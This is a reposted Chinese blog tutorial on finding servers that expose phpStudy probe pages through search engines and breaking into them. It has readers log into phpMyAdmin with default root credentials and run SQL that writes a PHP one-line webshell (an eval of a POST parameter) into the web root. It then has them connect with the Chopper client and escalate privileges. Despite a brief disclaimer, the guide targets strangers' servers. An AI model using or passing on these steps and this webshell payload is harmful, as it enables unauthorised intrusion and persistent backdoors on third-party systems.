码迷,mamicode.com
首页 > Web开发 > 详细

利用phpStudy 探针 提权网站服务器

时间:2018-06-17 21:23:11      阅读:887      评论:0      收藏:0      [点我收藏+]

标签:简单   自定义   lan   drop   down   原创文章   地址   服务   管理   

声明:

本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途!


  • 今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的.记录一下吧。

  • 搜索引擎KeyWord:

phpStudy 探针 2014

  • 多往后翻翻。翻个几十页最好。

  • 点开搜索到的内容。

技术分享图片

点开搜索到的内容。

翻到最下面,尝试连接mysql数据库是否正常(账号密码默认为:root):

技术分享图片

1、 如果提示正常。请在网页后面加上 ‘phpmyadmin’,如 http://www.baidu.com/phpmyadmin

2、 然后回车即可。

3、 出现以下界面;默认账号密码尝试登陆;

技术分享图片

4、 登陆成功后,第一步找到左边导航栏的MYSQL,然后点击上面的SQL,如图

5、 (点击mysql后,右侧表单会增加很多内容,不要理会他,直接点表单上方的SQL按钮即可。)

技术分享图片

6、 下面往SQL写入一句话木马,然后用菜刀连接即可!

技术分享图片

1、 图片效果不好,贴出代码,自行对比一下子- - 
2、 Code:

mysq1
sql 语句
Drop TABLE IF EXISTS 菜刀连接密码;
Create TABLE 自定义一个表名(cmd text NOT NULL);
Insert INTO 自定义一个表名 (cmd) VALUES(‘<?php @eval($_POST[菜刀连接密码])?>‘);
Select cmd from 自己编写 into outfile ‘D:/WWW/菜刀连接地址.php‘;[‘左边绝对地址需要根据网页自行更改‘]
Drop TABLE IF EXISTS 用户和密码;
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

7、 添加完成后,使用菜刀连接;

技术分享图片

后面tmp.php是在写入SQL一句话木马那自定义设置的。

技术分享图片

成功连上!可自行提权服务器等操作!

版权声明:本文为博主原创文章,转载需注明出处。 https://blog.csdn.net/u010984277/article/details/50799537

利用phpStudy 探针 提权网站服务器

标签:简单   自定义   lan   drop   down   原创文章   地址   服务   管理   

原文地址:https://www.cnblogs.com/apolloren/p/9193631.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!